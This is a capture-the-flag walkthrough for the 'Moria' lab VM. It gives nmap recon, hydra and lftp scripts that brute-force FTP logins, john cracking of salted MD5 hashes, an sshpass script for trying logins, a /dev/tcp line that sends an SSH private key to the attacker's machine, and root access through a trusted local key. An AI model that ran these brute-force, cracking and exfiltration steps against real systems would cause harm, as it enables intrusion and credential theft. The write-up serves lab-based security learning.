- Moria CTF Walkthrough - DigiP
- netdiscover
- 192.168.1.251 08:00:27:9a:4f:a4 6 360 PCS Systemtechnik GmbH
- nmap -sC -sV -T5 -v -p- --open --script vuln 192.168.1.251
- PORT STATE SERVICE VERSION
- 21/tcp open ftp vsftpd 2.0.8 or later
- |_sslv2-drown:
- 22/tcp open ssh OpenSSH 6.6.1 (protocol 2.0)
- 80/tcp open http Apache httpd 2.4.6 ((CentOS) PHP/5.4.16)
- |_http-csrf: Couldn't find any CSRF vulnerabilities.
- |_http-dombased-xss: Couldn't find any DOM based XSS.
- | http-enum:
- | /w/: Potentially interesting folder w/ directory listing
- |_ /icons/: Potentially interesting folder w/ directory listing
- |_http-server-header: Apache/2.4.6 (CentOS) PHP/5.4.16
- |_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
- |_http-trace: TRACE is enabled
- MAC Address: 08:00:27:9A:4F:A4 (Oracle VirtualBox virtual NIC)
- view-source:http://192.168.1.251/w/h/i/s/p/e/r/the_abyss/
- Telchar to Thrain:"That human is slow, don't give up yet"
- Refreshing the page, messages change:
- "Eru! Save us!"
- "Is this the end?"
- Fundin:"That human will never save us!"
- "Knock knock"
- Dain:"Is that human deaf? Why is it not listening?"
- Ori:"Will anyone hear us?"
- Balin: "Be quiet, the Balrog will hear you!"
- Nain:"Will the human get the message?"
- Maeglin:"The Balrog is not around, hurry!"
- "We will die here.."
- Oin:"Stop knocking!"
- gobuster -u http://192.168.1.251/w/h/i/s/p/e/r/the_abyss -f -e -x txt,html,php,jpg,gif,png,zip,sql,lock,conf,git,md -w /usr/share/wordlists/dirb/common.txt
- view-source:http://192.168.1.251/w/h/i/s/p/e/r/the_abyss/random.txt
- Balin: "Be quiet, the Balrog will hear you!"
- Oin:"Stop knocking!"
- Ori:"Will anyone hear us?"
- Fundin:"That human will never save us!"
- Nain:"Will the human get the message?"
- "Eru! Save us!"
- "We will die here.."
- "Is this the end?"
- "Knock knock"
- "Too loud!"
- Maeglin:"The Balrog is not around, hurry!"
- Telchar to Thrain:"That human is slow, don't give up yet"
- Dain:"Is that human deaf? Why is it not listening?"
- So index.php is reading this file in and echoing its contents out. We'll see later whether that comes in handy for abuse in any way.
- Connecting to the FTP server manually, the banner we are greeted with is:
- 220 Welcome Balrog!
- Name (Balrog:root): Balrog
- 331 Please specify the password.
- Password:
- We'll try the name Balrog first, then the other names we found in random.txt as we go. Our password wordlist will consist of the words from the home page image, plus the random.txt names and keywords in upper case, lower case, first-letter upper, etc.
- hydra -L /root/HDD2/ctf/moria/random -P /root/HDD2/ctf/moria/random ftp://192.168.1.251
- In doing so, ftp closes and ftps opens on port 900!
- We try:
- hydra -L /root/HDD2/ctf/moria/random -P /root/HDD2/ctf/moria/random ftps://192.168.1.251 -s 900
- hydra -L /root/HDD2/ctf/moria/random -P /root/HDD2/ctf/moria/random ftp://192.168.1.251 -s 900 -S
- ...and that closed, and now ftp is open again. Need to try this a bit differently. Hydra does not seem to be waiting long enough for the responses and may be crushing it.
- Let's try something different. lftp is a scriptable FTP client. We can work through this in a similar fashion to hydra, but in a more controlled way, through a bash script.
- syntax: lftp -u $user,$pass sftp://target
- So, let's try.
- Added to our hosts file:
- 192.168.1.251 Balrog
- moria.sh
- ---------------------------
- #!/bin/bash
- # bash, not sh: the [[ ]] test below is a bash builtin
- while IFS='' read -r line || [[ -n "$line" ]]; do
- # Use one user at a time so as not to trigger the port knock (maybe); see where this happens.
- echo "$line" # echo the password we try each time and monitor the console to see what happens on each attempt
- lftp -d -u Balrog,"$line" ftp://balrog:21/ << --EOF--
- pwd
- quit
- --EOF--
- done < "/root/HDD2/ctf/moria/random"
- ---------------------------
- We have to edit /etc/lftp.conf and add the following at the end of the file:
- #set timeout
- set net:timeout 2
- set net:max-retries 2
- set net:reconnect-interval-base 5
- We'll run this like so:
- bash moria.sh > moria.log
- This will try connecting with the name given in the first -u argument, with the password from each line of the random wordlist file.
- If Balrog doesn't work, then we edit the script and try the next name from random.txt, and so on. This seems not to trigger the port close and the open on 900.
- Now, the reason I redirected output to moria.log is that much of this is going to scroll by and off screen. Looking through it in terminal scroll-back is a PITA, and we could potentially miss our login deets if not paying attention. moria.log will show the password we passed and the output for pwd if it is successful. The password would be the word on the line directly above the pwd command output.
- If you see this not working and it trips over to port 900 and closes ftp, shorten your wordlist, wait for ftp to open again, rinse, repeat. This will not be a quick process with a long wordlist, so keep it simple (stupid). There are probably better ways of doing this, but hydra does not seem to be working for me at the moment and keeps triggering port 900 open and 21 closed, even when I specify individual logins. Also, SSH with hydra closes the port almost immediately, so we'll have to be careful how we try our logins.
- Output on the terminal will look similar to:
- 220 Welcome Balrog!
- ---> FEAT
- <--- 211-Features:
- <--- EPRT
- <--- EPSV
- <--- MDTM
- <--- PASV
- <--- REST STREAM
- <--- SIZE
- <--- TVFS
- <--- UTF8
- <--- 211 End
- ---> AUTH TLS
- <--- 530 Please login with USER and PASS.
- ---> OPTS UTF8 ON
- <--- 200 Always in UTF8 mode.
- ---> USER Balrog
- where our log that helps us find the password is:
- Balin
- Oin
- Ori
- mellon
- Mellon
- ftp://Balrog:Mellon@192.168.1.251:21/%2Fprison
- Balrog
- We see our password worked for "Mellon"
- :)
- So the deets are "Balrog" and "Mellon".
- However, /prison does not look promising..
- Trying this for SSH, we realize this isn't going to work here either:
- ssh Balrog@192.168.1.251
- Balrog@192.168.1.251's password:
- Last failed login: Fri Apr 21 07:54:13 EDT 2017 from 192.168.1.66 on ssh:notty
- There were 2 failed login attempts since the last successful login.
- Last login: Sun Mar 12 22:39:59 2017
- WRONG GATE!
- Connection to 192.168.1.251 closed.
- root@kali:/mnt/HDD2/ctf/moria#
- sftp Balrog@192.168.1.251 900
- Balrog@192.168.1.251's password:
- Received message too long 173494863
- so back to moria over ftp.
- ftp Balrog
- user: Balrog
- pass: Mellon
- pwd
- /prison
- We can't list or put any files up: denied.
- It keeps asking for PASV mode. We enter:
- quote pasv
- and now we can list files.
- cd /var/www/html
- ls
- ftp> ls
- 200 PORT command successful. Consider using PASV.
- 150 Here comes the directory listing.
- drwxr-xr-x 2 0 0 23 Mar 12 20:38 QlVraKW4fbIkXau9zkAPNGzviT3UKntl
- -r-------- 1 48 48 85 Mar 12 19:55 index.php
- -r-------- 1 48 48 161595 Mar 11 23:12 moria.jpg
- drwxr-xr-x 3 0 0 15 Mar 12 04:50 w
- 226 Directory send OK.
- We navigate to http://192.168.1.251/QlVraKW4fbIkXau9zkAPNGzviT3UKntl/ which gets us:
- Prisoner's name Passkey
- Balin c2d8960157fc8540f6d5d66594e165e0
- Oin 727a279d913fba677c490102b135e51e
- Ori 8c3c3152a5c64ffb683d78efc3520114
- Maeglin 6ba94d6322f53f30aca4f34960203703
- Fundin c789ec9fae1cd07adfc02930a39486a1
- Nain fec21f5c7dcf8e5e54537cfda92df5fe
- Dain 6a113db1fd25c5501ec3a5936d817c29
- Thrain 7db5040c351237e8332bfbba757a1019
- Telchar dd272382909a4f51163c77da6356cc6f
- Also viewing source we find:
- <!--
- 6MAp84
- bQkChe
- HnqeN4
- e5ad5s
- g9Wxv7
- HCCsxP
- cC5nTr
- h8spZR
- tb9AWe
- MD5(MD5(Password).Salt)
- -->
- We can try and build a hash file for john like so:
- Balin:c2d8960157fc8540f6d5d66594e165e0$6MAp84
- Oin:727a279d913fba677c490102b135e51e$bQkChe
- Ori:8c3c3152a5c64ffb683d78efc3520114$HnqeN4
- Maeglin:6ba94d6322f53f30aca4f34960203703$e5ad5s
- Fundin:c789ec9fae1cd07adfc02930a39486a1$g9Wxv7
- Nain:fec21f5c7dcf8e5e54537cfda92df5fe$HCCsxP
- Dain:6a113db1fd25c5501ec3a5936d817c29$cC5nTr
- Thrain:7db5040c351237e8332bfbba757a1019$h8spZR
- Telchar:dd272382909a4f51163c77da6356cc6f$tb9AWe
- john --list=subformats
- We want: MD5(MD5(Password).Salt)
- UserFormat = dynamic_2006 type = dynamic_2006: md5(md5($p).$s) (PW > 55 bytes)
- john hashes --format=dynamic_2006 --fork=25 -w=/usr/share/wordlists/rockyou.txt
- darkness (Thrain)
- magic (Telchar)
- abcdef (Dain)
- hunter2 (Fundin)
- spanky (Ori)
- warrior (Nain)
- rainbow (Oin)
- flower (Balin)
- fuckoff (Maeglin)
- Nice and quick!!
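As an added example (not part of the original walkthrough), the scheme from the HTML comment implemented in Python, so the reader can check what john's dynamic_2006 format actually computes and why it falls so quickly: the inner MD5 is hex-encoded before the public salt is appended, and one fast MD5 per guess is all a verifier costs. Pairing the salts with the names in the order the comment lists them is the walkthrough's assumption, reproduced here.

```python
import hashlib
import hmac

# Constructed from the page's passkey table and the salts in the HTML comment,
# paired in the order they are listed (the walkthrough's assumption).
PRISONERS = [
    ("Balin",   "c2d8960157fc8540f6d5d66594e165e0", "6MAp84"),
    ("Oin",     "727a279d913fba677c490102b135e51e", "bQkChe"),
    ("Ori",     "8c3c3152a5c64ffb683d78efc3520114", "HnqeN4"),
    ("Maeglin", "6ba94d6322f53f30aca4f34960203703", "e5ad5s"),
    ("Fundin",  "c789ec9fae1cd07adfc02930a39486a1", "g9Wxv7"),
    ("Nain",    "fec21f5c7dcf8e5e54537cfda92df5fe", "HCCsxP"),
    ("Dain",    "6a113db1fd25c5501ec3a5936d817c29", "cC5nTr"),
    ("Thrain",  "7db5040c351237e8332bfbba757a1019", "h8spZR"),
    ("Telchar", "dd272382909a4f51163c77da6356cc6f", "tb9AWe"),
]

# Passwords the walkthrough reports john recovered, keyed by name.
CRACKED = {"Thrain": "darkness", "Telchar": "magic", "Dain": "abcdef",
           "Fundin": "hunter2", "Ori": "spanky", "Nain": "warrior",
           "Oin": "rainbow", "Balin": "flower", "Maeglin": "fuckoff"}


def legacy_hash(password: str, salt: str) -> str:
    """MD5(MD5(Password).Salt) as john's dynamic_2006 reads it: the inner
    digest is its 32-char lowercase hex string, then the salt is appended."""
    inner = hashlib.md5(password.encode()).hexdigest()
    return hashlib.md5((inner + salt).encode()).hexdigest()


def verify(password: str, salt: str, expected: str) -> bool:
    """Constant-time comparison; the scheme itself is still unsuitable for
    storing passwords because one guess costs a single fast MD5."""
    return hmac.compare_digest(legacy_hash(password, salt), expected.lower())


def john_lines(entries):
    """Build the user:hash$salt lines the walkthrough feeds to john."""
    return [f"{name}:{digest}${salt}" for name, digest, salt in entries]


def matching_entries(entries, candidates):
    """Names whose candidate password reproduces the stored passkey."""
    return sorted(name for name, digest, salt in entries
                  if name in candidates and verify(candidates[name], salt, digest))


if __name__ == "__main__":
    print("\n".join(john_lines(PRISONERS)))
    print("candidates that reproduce their passkey:", matching_entries(PRISONERS, CRACKED))
```

Running it prints the john hash file and reports which of the walkthrough's recovered passwords reproduce the stored passkeys under this reading of the scheme.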
- We already know Balrog is Mellon and not going to work on SSH.
- We've now got some more items we can add to a password/wordlist.
- FTP logins with the above don't seem to work. We can try triggering port 900 again and seeing if any of these will work.
- We try:
- hydra -l Balin -P random ftps://balrog -s900
- hydra -l Balin -P random ftp://balrog -s900 -S
- Neither work
- :(
- hydra -L names -P random ftps://balrog -s900
- hydra -L names -P random ftp://balrog -s900 -S
- We can adjust our lftp script again:
- ---------------------------
- #!/bin/bash
- # bash, not sh: the [[ ]] test below is a bash builtin
- while IFS='' read -r line || [[ -n "$line" ]]; do
- # Use one user at a time so as not to trigger the port knock (maybe); see where this happens.
- echo "$line" # echo the password we try each time and monitor the console to see what happens on each attempt
- lftp -d -u Balin,"$line" ftps://192.168.1.251:900/ << --EOF--
- pwd
- quit
- --EOF--
- # end of heredoc delimiter
- done < "/root/HDD2/ctf/moria/random"
- ---------------------------
- So none of these seem to work for ftp or ftps.
- Let's try SSH:
- hydra -L names -P random ssh://balrog
- These aren't going well with hydra. Ports keep closing, including SSH. lftp doesn't support ssh either. So, we try each user, one at a time:
- --------------------------
- #!/bin/bash
- ## balrog ssh attempts: one sshpass call per user; the <( ) process substitution needs bash
- sshpass -f <(printf '%s\n' darkness) ssh Thrain@balrog
- sshpass -f <(printf '%s\n' magic) ssh Telchar@balrog
- sshpass -f <(printf '%s\n' abcdef) ssh Dain@balrog
- sshpass -f <(printf '%s\n' hunter2) ssh Fundin@balrog
- sshpass -f <(printf '%s\n' spanky) ssh Ori@balrog
- sshpass -f <(printf '%s\n' warrior) ssh Nain@balrog
- sshpass -f <(printf '%s\n' rainbow) ssh Oin@balrog
- sshpass -f <(printf '%s\n' flower) ssh Balin@balrog
- sshpass -f <(printf '%s\n' fuckoff) ssh Maeglin@balrog
- --------------------------
- And with that, we get:
- bash moria.sh
- Permission denied, please try again.
- Permission denied, please try again.
- Permission denied, please try again.
- Permission denied, please try again.
- Last login: Sun Mar 12 22:57:09 2017
- -bash-4.2$ id
- uid=1002(Ori) gid=1003(notBalrog) groups=1003(notBalrog)
- -bash-4.2$
- Boom! Login with Ori!
- Ori pts/0 2017-04-21 09:28 (192.168.1.66)
- -bash-4.2$ uname -a;cat /etc/*ele*; cat /etc/issue
- Linux Moria 3.10.0-514.el7.x86_64 #1 SMP Tue Nov 22 16:42:41 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux
- CentOS Linux release 7.3.1611 (Core)
- Derived from Red Hat Enterprise Linux 7.3 (Source)
- NAME="CentOS Linux"
- VERSION="7 (Core)"
- ID="centos"
- ID_LIKE="rhel fedora"
- VERSION_ID="7"
- PRETTY_NAME="CentOS Linux 7 (Core)"
- ANSI_COLOR="0;31"
- CPE_NAME="cpe:/o:centos:centos:7"
- HOME_URL="https://www.centos.org/"
- BUG_REPORT_URL="https://bugs.centos.org/"
- CENTOS_MANTISBT_PROJECT="CentOS-7"
- CENTOS_MANTISBT_PROJECT_VERSION="7"
- REDHAT_SUPPORT_PRODUCT="centos"
- REDHAT_SUPPORT_PRODUCT_VERSION="7"
- CentOS Linux release 7.3.1611 (Core)
- CentOS Linux release 7.3.1611 (Core)
- cpe:/o:centos:centos:7
- [MOTD banner: "MORIA" in ASCII art]
- -bash-4.2$
- -bash-4.2$ cat /etc/passwd
- root:x:0:0:root:/root:/bin/bash
- bin:x:1:1:bin:/bin:/sbin/nologin
- daemon:x:2:2:daemon:/sbin:/sbin/nologin
- adm:x:3:4:adm:/var/adm:/sbin/nologin
- lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
- sync:x:5:0:sync:/sbin:/bin/sync
- shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
- halt:x:7:0:halt:/sbin:/sbin/halt
- mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
- operator:x:11:0:operator:/root:/sbin/nologin
- games:x:12:100:games:/usr/games:/sbin/nologin
- ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
- nobody:x:99:99:Nobody:/:/sbin/nologin
- systemd-bus-proxy:x:999:998:systemd Bus Proxy:/:/sbin/nologin
- systemd-network:x:192:192:systemd Network Management:/:/sbin/nologin
- dbus:x:81:81:System message bus:/:/sbin/nologin
- polkitd:x:998:997:User for polkitd:/:/sbin/nologin
- tss:x:59:59:Account used by the trousers package to sandbox the tcsd daemon:/dev/null:/sbin/nologin
- sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
- postfix:x:89:89::/var/spool/postfix:/sbin/nologin
- chrony:x:997:995::/var/lib/chrony:/sbin/nologin
- geoclue:x:996:994:User for geoclue:/var/lib/geoclue:/sbin/nologin
- usbmuxd:x:113:113:usbmuxd user:/:/sbin/nologin
- rtkit:x:172:172:RealtimeKit:/proc:/sbin/nologin
- colord:x:995:993:User for colord:/var/lib/colord:/sbin/nologin
- pulse:x:171:171:PulseAudio System Daemon:/var/run/pulse:/sbin/nologin
- gdm:x:42:42::/var/lib/gdm:/sbin/nologin
- apache:x:48:48:Apache:/usr/share/httpd:/sbin/nologin
- abatchy:x:1000:1003::/home/abatchy:/bin/bash
- Balrog:x:1001:1001::/prison:/sbin/nologin
- Ori:x:1002:1003::/home/Ori:/bin/bash
- cd /home
- ls
- batchy Ori
- -bash-4.2$ cd abatchy/
- -bash: cd: abatchy/: Permission denied
- -bash-4.2$ cd Ori/
- -bash-4.2$ ls -la
- total 8
- drwx------ 3 Ori notBalrog 55 Mar 12 22:57 .
- drwxr-x---. 4 root notBalrog 32 Mar 14 00:36 ..
- -rw------- 1 Ori notBalrog 1 Mar 14 00:12 .bash_history
- -rw-r--r-- 1 root root 225 Mar 13 23:53 poem.txt
- drwx------ 2 Ori notBalrog 57 Mar 12 22:57 .ssh
- -bash-4.2$ cat .bash_history
- -bash-4.2$ cat poem.txt
- Ho! Ho! Ho! to the bottle I go
- To heal my heart and drown my woe.
- Rain may fall and wind may blow,
- And many miles be still to go,
- But under a tall tree I will lie,
- And let the clouds go sailing by.
- PS: Moria will not fall!
- -bash-4.2$
- We tarball the .ssh files and send them back to us for the keys.
- The id_rsa file seems corrupt, so let's send it by itself:
- cat id_rsa >& /dev/tcp/192.168.1.66/443 0>&1
- Later we find these keys don't work from our box, because known_hosts indicates that the user has been logging into SSH over 127.0.0.1 from the logged-in account. This requires us to ssh while logged in as Ori. To root? Oh yeah!
- -bash-4.2$ cat known_hosts
- 127.0.0.1 ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBCuLX/CWxsOhekXJRxQqQH/Yx0SD+XgUpmlmWN1Y8cvmCYJslOh4vE+I6fmMwCdBfi4W061RmFc+vMALlQUYNz0=
- -bash-4.2$ #hmm. 127.0.0.1 you don't say...
- -bash-4.2$ ssh root@127.0.0.1
- Last login: Fri Apr 21 10:32:40 2017 from 127.0.0.1
- [root@Moria ~]# #winner winner chicken dinner, no password asked..
- [root@Moria ~]# ls -lash
- total 52K
- 0 dr-xr-x---. 8 root root 276 Mar 12 23:02 .
- 0 dr-xr-xr-x. 18 root root 258 Mar 14 00:36 ..
- 4.0K -rw-r--r-- 1 root root 21 Mar 12 21:44 0
- 4.0K -rw-------. 1 root root 1.3K Mar 9 22:41 anaconda-ks.cfg
- 4.0K -rw-------. 1 root root 325 Apr 21 10:33 .bash_history
- 4.0K -rw-r--r-- 1 root root 18 Dec 28 2013 .bash_logout
- 4.0K -rw-r--r-- 1 root root 176 Dec 28 2013 .bash_profile
- 4.0K -rw-r--r-- 1 root root 176 Dec 28 2013 .bashrc
- 0 drwx------. 7 root root 86 Mar 9 23:47 .cache
- 0 drwxr-xr-x. 10 root root 128 Mar 9 23:10 .config
- 4.0K -rw-r--r-- 1 root root 100 Dec 28 2013 .cshrc
- 0 drwxr-xr-x. 2 root root 6 Mar 9 23:10 Desktop
- 4.0K -rw-r--r-- 1 root root 439 Mar 13 23:57 flag.txt
- 4.0K -rw-r--r-- 1 root root 20 Mar 11 21:00 hosts
- 12K -rw-------. 1 root root 8.5K Mar 12 22:30 .ICEauthority
- 0 drwx------. 3 root root 19 Mar 9 23:10 .local
- 0 drwxr-----. 3 root root 19 Mar 11 11:35 .pki
- 0 drwx------ 2 root root 48 Mar 12 23:00 .ssh
- 4.0K -rw-r--r-- 1 root root 129 Dec 28 2013 .tcshrc
- [root@Moria ~]# cat flag.txt
- “All that is gold does not glitter,
- Not all those who wander are lost;
- The old that is strong does not wither,
- Deep roots are not reached by the frost.
- From the ashes a fire shall be woken,
- A light from the shadows shall spring;
- Renewed shall be blade that was broken,
- The crownless again shall be king.”
- All That is Gold Does Not Glitter by J. R. R. Tolkien
- I hope you suff.. enjoyed this VM. It wasn't so hard, was it?
- -Abatchy
- [root@Moria ~]#
- :)